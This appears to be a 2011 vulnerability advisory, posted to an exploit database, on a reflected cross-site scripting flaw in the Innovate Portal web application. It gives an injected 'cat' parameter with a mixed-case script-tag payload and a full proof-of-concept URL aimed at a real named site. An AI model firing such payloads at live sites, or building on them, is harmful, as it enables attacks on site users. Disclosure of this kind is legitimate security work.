Innovate Portal suffers from a cross site scripting vulnerability.
c22074c325aeb15c37ca4f5817b771e46b72c691ba9e1f8b7e6fa94deaaf3133
# Exploit Title: Innovate Portal XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
XSS can be done using the command input
Vulnerable Page:
index.php
Example:
index.php?cat=<XSS
Code>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
Exploit:
index.php?cat='"()%26%251<ScRiPt
>prompt(948044)<%2fScRiPt>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
POC:
http://www.innovate-board.de/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr